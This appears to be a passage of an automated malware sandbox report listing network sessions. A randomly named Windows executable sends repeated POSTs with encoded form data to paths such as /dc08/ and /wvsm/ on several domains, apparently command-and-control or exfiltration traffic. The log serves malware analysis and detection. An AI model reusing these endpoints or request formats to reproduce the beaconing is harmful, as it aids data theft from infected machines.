                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.sunnyz.store
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Jan 11, 2025 03:33:30.621088982 CET1236INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 02:33:30 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Security-Policy: default-src 'self'; script-src 'nonce-8c8ee1ccc8d44976ab020ba18eb6b684';
                                                          Vary: Accept-Language
                                                          Data Raw: 39 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 38 63 38 65 65 31 63 63 63 38 64 34 34 39 37 36 61 62 30 32 30 62 61 31 38 65 62 36 62 36 38 34 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                          Data Ascii: 91c<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-8c8ee1ccc8d44976ab020ba18eb6b684';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>sunnyz.store</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class
                                                          Jan 11, 2025 03:33:30.621104002 CET1236INData Raw: 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e
                                                          Data Ascii: ="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=s
                                                          Jan 11, 2025 03:33:30.621119022 CET155INData Raw: 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c 29 20 2b 20 27
                                                          Data Ascii: ner('click', (e) => { window.location.replace(atob(e.target.dataset.url) + 'sunnyz.store'); }); });</script></main></div> </body></html>
                                                          Jan 11, 2025 03:33:30.621124029 CET5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.104999213.228.81.39806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:33:36.127999067 CET854OUTPOST /dc08/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.muasamgiare.click
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 193
                                                          Cache-Control: no-cache
                                                          Origin: http://www.muasamgiare.click
                                                          Referer: http://www.muasamgiare.click/dc08/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 48 36 4f 58 4d 2f 6f 33 2b 6c 39 61 67 50 30 6c 55 67 69 2f 6c 4d 75 56 6f 74 30 52 33 33 58 6a 32 78 75 7a 59 74 65 6a 52 63 63 31 75 67 79 45 65 75 54 32 51 72 39 64 39 5a 62 39 44 61 69 34 75 7a 72 76 77 30 30 66 61 2f 6d 46 39 6d 6b 43 6f 70 54 4b 39 49 50 7a 31 4e 53 68 6f 36 79 4f 6a 54 74 63 54 59 55 79 2b 6c 6d 79 61 36 58 41 51 59 74 61 44 62 44 78 76 76 46 77 39 67 51 37 59 47 37 6a 64 6f 6f 62 46 32 72 63 6c 79 44 57 35 6e 6c 57 56 57 75 4e 73 4d 55 6a 69 77 68 44 30 52 57 51 50 6b 36 4d 49 32 76 53 63 4a 39 54 73 58 71 65 62 37 77 58 34 76 48 7a
                                                          Data Ascii: WLtH=H6OXM/o3+l9agP0lUgi/lMuVot0R33Xj2xuzYtejRcc1ugyEeuT2Qr9d9Zb9Dai4uzrvw00fa/mF9mkCopTK9IPz1NSho6yOjTtcTYUy+lmya6XAQYtaDbDxvvFw9gQ7YG7jdoobF2rclyDW5nlWVWuNsMUjiwhD0RWQPk6MI2vScJ9TsXqeb7wX4vHz
                                                          Jan 11, 2025 03:33:37.057487011 CET368INHTTP/1.1 301 Moved Permanently
                                                          Server: openresty
                                                          Date: Sat, 11 Jan 2025 02:33:36 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 166
                                                          Connection: close
                                                          Location: https://www.muasamgiare.click/dc08/
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.104999313.228.81.39806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:33:38.683995008 CET878OUTPOST /dc08/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.muasamgiare.click
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 217
                                                          Cache-Control: no-cache
                                                          Origin: http://www.muasamgiare.click
                                                          Referer: http://www.muasamgiare.click/dc08/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 48 36 4f 58 4d 2f 6f 33 2b 6c 39 61 68 76 6b 6c 57 44 4b 2f 31 63 75 53 32 64 30 52 39 58 58 6e 32 78 71 7a 59 73 71 4e 57 71 4d 31 75 45 69 45 66 76 54 32 52 72 39 64 79 4a 62 30 41 71 69 78 75 7a 6d 4d 77 32 51 66 61 2f 79 46 39 6b 38 43 76 65 50 4e 38 59 50 78 39 74 53 6a 31 71 79 4f 6a 54 74 63 54 59 42 6c 2b 6b 4f 79 61 4c 6e 41 52 38 78 62 66 72 44 79 6f 76 46 77 73 77 51 6e 59 47 37 64 64 70 6b 39 46 77 33 63 6c 33 6e 57 35 32 6c 56 63 57 75 50 6f 4d 56 64 6a 46 59 37 7a 7a 57 64 41 53 6d 35 58 47 4c 72 62 6f 41 55 39 47 4c 4a 49 4d 73 5a 32 70 79 5a 4e 52 52 64 31 34 4b 79 6c 79 54 34 4e 61 4e 78 52 4f 32 55 63 41 3d 3d
                                                          Data Ascii: WLtH=H6OXM/o3+l9ahvklWDK/1cuS2d0R9XXn2xqzYsqNWqM1uEiEfvT2Rr9dyJb0AqixuzmMw2Qfa/yF9k8CvePN8YPx9tSj1qyOjTtcTYBl+kOyaLnAR8xbfrDyovFwswQnYG7ddpk9Fw3cl3nW52lVcWuPoMVdjFY7zzWdASm5XGLrboAU9GLJIMsZ2pyZNRRd14KylyT4NaNxRO2UcA==
                                                          Jan 11, 2025 03:33:39.608261108 CET368INHTTP/1.1 301 Moved Permanently
                                                          Server: openresty
                                                          Date: Sat, 11 Jan 2025 02:33:39 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 166
                                                          Connection: close
                                                          Location: https://www.muasamgiare.click/dc08/
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.104999413.228.81.39806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:33:41.231348038 CET1891OUTPOST /dc08/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.muasamgiare.click
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1229
                                                          Cache-Control: no-cache
                                                          Origin: http://www.muasamgiare.click
                                                          Referer: http://www.muasamgiare.click/dc08/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 48 36 4f 58 4d 2f 6f 33 2b 6c 39 61 68 76 6b 6c 57 44 4b 2f 31 63 75 53 32 64 30 52 39 58 58 6e 32 78 71 7a 59 73 71 4e 57 71 45 31 75 32 71 45 64 4d 37 32 58 62 39 64 78 4a 62 35 41 71 6a 7a 75 7a 2f 46 77 32 73 31 61 35 2b 46 37 48 30 43 71 73 6e 4e 33 59 50 78 2f 74 53 69 6f 36 79 68 6a 54 39 59 54 59 52 6c 2b 6b 4f 79 61 49 2f 41 42 59 74 62 64 72 44 78 76 76 45 6b 39 67 51 62 59 47 7a 53 64 70 67 4c 46 6a 76 63 6c 58 58 57 2f 45 39 56 58 57 75 33 76 4d 56 56 6a 46 63 6b 7a 7a 62 73 41 53 36 48 58 45 72 72 5a 66 52 76 69 31 54 73 4b 74 52 4d 77 70 69 50 49 45 68 6e 36 62 50 36 76 54 62 38 61 35 77 56 64 4f 33 63 66 6c 58 7a 74 6f 57 77 4a 6d 63 72 64 44 41 55 6e 6d 2f 52 6f 4e 2f 72 67 6e 45 49 32 6c 6a 45 42 68 78 68 38 52 58 6e 49 75 51 30 32 68 71 66 64 30 32 78 47 59 64 53 37 6c 58 51 36 46 71 64 51 4f 44 7a 34 76 4b 59 77 71 6d 64 73 31 32 67 6e 4d 62 52 4a 72 76 37 34 55 54 34 48 50 71 4d 76 39 39 33 46 58 73 52 42 32 34 4b 53 38 2b 79 62 63 43 63 4d 38 63 6a 44 31 47 55 72 [TRUNCATED]
                                                          Data Ascii: WLtH=H6OXM/o3+l9ahvklWDK/1cuS2d0R9XXn2xqzYsqNWqE1u2qEdM72Xb9dxJb5Aqjzuz/Fw2s1a5+F7H0CqsnN3YPx/tSio6yhjT9YTYRl+kOyaI/ABYtbdrDxvvEk9gQbYGzSdpgLFjvclXXW/E9VXWu3vMVVjFckzzbsAS6HXErrZfRvi1TsKtRMwpiPIEhn6bP6vTb8a5wVdO3cflXztoWwJmcrdDAUnm/RoN/rgnEI2ljEBhxh8RXnIuQ02hqfd02xGYdS7lXQ6FqdQODz4vKYwqmds12gnMbRJrv74UT4HPqMv993FXsRB24KS8+ybcCcM8cjD1GUrNpMDKuDaHwx536ZpM6JlQk0RrgPC9enppI9VgMBoT+BKRoHpwrwCWkGEWq/yVOEuYrd1PyQQwdzk/J/vX3k2C+mhOiWTTSwz5N8Vmdk8iAApIq92Q0Imp6itMPEQ6zxYvQkyYM827i9BumHbLrc9eqfUUAWe6DnbwdZv15w48KiwYm61T+Uxs7XjOARS05b8WAZjEiBrQdLGrnZkLb/QbKnIsbVLopLWzwkck0//7P9yaFJBagYsAdP9A5OYP5ILc0fY+J3rc4vd4oBLPVEFvLfMPefOqoKcwWv1u8jUWGYDYlvXPjSml7qTjDw2XJ9Xp7jMivvSlTUUjtYK7azL0mtIPa3iyBmxcCjoWj0fHFbBaYAnGbY3F8l2sABH5geefYLGyH0SPRPU6RR4d+67tH5fekARNrVtn1xTAcPi8+US3UeqkmpSmRZZZD/BwUA0vN34b2Fy9HNVfUKJakR5+aBrQJ8PAtRzNvpFIDPJeEVmXaoBLCDdxjP8PdEJhmJFL0ETJfqRZaoo2l5AihhA72UoOaLQn6GJ+WJtOSc/zJoFMypd1PdvY69COg7NQIsKtxMGtiQpBY3tfXIS5gY0SyzjY6Iua7jdYFOE5+uD29+uXhnZxKZWDVngz/3YhF1e9cuPa0CxYrAnn9R/SqnLulBgXoZhNifiYH [TRUNCATED]
                                                          Jan 11, 2025 03:33:42.183360100 CET368INHTTP/1.1 301 Moved Permanently
                                                          Server: openresty
                                                          Date: Sat, 11 Jan 2025 02:33:42 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 166
                                                          Connection: close
                                                          Location: https://www.muasamgiare.click/dc08/
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.104999513.228.81.39806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:33:43.774265051 CET586OUTGET /dc08/?WLtH=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z0+LVyr2ClayYlRRqEL4rpFPwSbvhCg==&W0-=CzJDBfQxOTFPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.muasamgiare.click
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Jan 11, 2025 03:33:44.702028990 CET508INHTTP/1.1 301 Moved Permanently
                                                          Server: openresty
                                                          Date: Sat, 11 Jan 2025 02:33:44 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 166
                                                          Connection: close
                                                          Location: https://www.muasamgiare.click/dc08/?WLtH=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z0+LVyr2ClayYlRRqEL4rpFPwSbvhCg==&W0-=CzJDBfQxOTFPL
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.104999613.248.169.48806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:33:49.757082939 CET857OUTPOST /wvsm/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.sfantulandrei.info
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 193
                                                          Cache-Control: no-cache
                                                          Origin: http://www.sfantulandrei.info
                                                          Referer: http://www.sfantulandrei.info/wvsm/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 4b 33 42 2f 57 6f 49 76 63 72 70 6c 4c 52 68 57 74 50 71 4b 46 37 64 4c 4b 39 4c 4f 6f 41 75 36 47 64 59 74 70 37 31 68 4b 2b 70 70 68 56 78 44 75 35 67 4d 46 6d 73 41 69 44 63 43 41 7a 50 72 4f 72 79 74 31 6e 46 76 58 38 76 32 35 38 37 51 70 67 2b 65 72 67 69 2b 6e 43 31 68 33 46 75 31 4c 77 61 48 77 39 59 45 59 64 72 6e 52 6b 6c 78 64 6c 48 6d 50 58 6c 77 71 5a 76 53 62 7a 74 68 47 33 49 59 34 73 50 69 2f 53 49 79 6f 77 75 2b 74 75 6c 75 6b 7a 5a 51 44 6c 52 2f 76 59 74 76 56 53 4a 51 6a 59 48 36 6f 74 74 31 37 35 67 69 45 78 52 68 46 35 74 30 6b 31 43 62
                                                          Data Ascii: WLtH=K3B/WoIvcrplLRhWtPqKF7dLK9LOoAu6GdYtp71hK+pphVxDu5gMFmsAiDcCAzPrOryt1nFvX8v2587Qpg+ergi+nC1h3Fu1LwaHw9YEYdrnRklxdlHmPXlwqZvSbzthG3IY4sPi/SIyowu+tulukzZQDlR/vYtvVSJQjYH6ott175giExRhF5t0k1Cb
                                                          Jan 11, 2025 03:33:50.195827007 CET73INHTTP/1.1 405 Method Not Allowed
                                                          content-length: 0
                                                          connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.104999713.248.169.48806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:33:52.309338093 CET881OUTPOST /wvsm/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.sfantulandrei.info
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 217
                                                          Cache-Control: no-cache
                                                          Origin: http://www.sfantulandrei.info
                                                          Referer: http://www.sfantulandrei.info/wvsm/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 4b 33 42 2f 57 6f 49 76 63 72 70 6c 52 78 52 57 69 50 57 4b 41 62 64 4d 47 64 4c 4f 39 77 75 6d 47 64 55 74 70 36 41 6b 4b 4d 39 70 68 77 56 44 76 38 4d 4d 4c 47 73 41 32 54 63 48 66 6a 4f 6c 4f 72 2b 6c 31 6b 64 76 58 39 50 32 35 35 48 51 70 7a 57 64 70 77 69 34 75 69 31 5a 30 31 75 31 4c 77 61 48 77 39 4d 39 59 64 54 6e 51 57 78 78 48 41 7a 6c 52 48 6c 2f 38 4a 76 53 66 7a 74 6c 47 33 49 2b 34 75 36 48 2f 51 77 79 6f 78 65 2b 73 37 46 76 75 7a 5a 57 4d 46 51 49 6a 36 45 31 52 68 31 62 68 61 76 79 6f 66 6c 72 38 59 64 6c 56 67 77 32 57 4f 78 36 71 7a 33 78 2f 4c 31 37 31 49 57 68 75 69 64 6b 55 7a 63 65 61 33 52 44 54 41 3d 3d
                                                          Data Ascii: WLtH=K3B/WoIvcrplRxRWiPWKAbdMGdLO9wumGdUtp6AkKM9phwVDv8MMLGsA2TcHfjOlOr+l1kdvX9P255HQpzWdpwi4ui1Z01u1LwaHw9M9YdTnQWxxHAzlRHl/8JvSfztlG3I+4u6H/Qwyoxe+s7FvuzZWMFQIj6E1Rh1bhavyoflr8YdlVgw2WOx6qz3x/L171IWhuidkUzcea3RDTA==
                                                          Jan 11, 2025 03:33:52.749594927 CET73INHTTP/1.1 405 Method Not Allowed
                                                          content-length: 0
                                                          connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.104999813.248.169.48806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:33:54.855760098 CET1894OUTPOST /wvsm/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.sfantulandrei.info
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1229
                                                          Cache-Control: no-cache
                                                          Origin: http://www.sfantulandrei.info
                                                          Referer: http://www.sfantulandrei.info/wvsm/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 4b 33 42 2f 57 6f 49 76 63 72 70 6c 52 78 52 57 69 50 57 4b 41 62 64 4d 47 64 4c 4f 39 77 75 6d 47 64 55 74 70 36 41 6b 4b 4e 46 70 67 44 74 44 75 66 55 4d 49 47 73 41 71 6a 63 47 66 6a 4f 6f 4f 72 6d 62 31 6a 56 2f 58 35 2f 32 35 66 7a 51 39 57 71 64 6a 77 69 34 73 69 31 69 33 46 75 6b 4c 77 4b 39 77 39 63 39 59 64 54 6e 51 57 64 78 52 46 48 6c 54 48 6c 77 71 5a 76 4f 62 7a 73 36 47 7a 63 41 34 75 75 39 2f 68 51 79 76 52 4f 2b 75 49 74 76 73 54 5a 55 50 46 51 51 6a 36 5a 72 52 68 59 69 68 65 76 49 6f 64 6c 72 2f 4a 6b 50 49 79 67 4f 44 4d 35 6b 30 6a 7a 53 77 73 35 63 76 63 37 59 69 7a 4e 36 4f 43 6f 4a 58 48 46 49 4c 65 6a 47 63 4b 74 2f 6e 5a 2b 6f 7a 48 74 43 72 31 6c 62 33 38 4e 34 7a 2b 68 4e 53 52 2b 32 6c 6c 58 53 44 31 79 58 4c 61 43 53 59 59 64 44 77 56 62 31 6c 47 36 4d 51 70 53 72 4a 31 65 37 31 30 62 74 6a 5a 48 32 56 6f 72 59 48 6e 7a 44 55 45 65 52 58 5a 4e 37 69 4b 59 6c 68 62 76 73 46 56 79 48 6e 75 62 47 4b 58 4b 7a 52 54 66 70 59 62 65 56 55 7a 6d 70 72 61 65 66 59 [TRUNCATED]
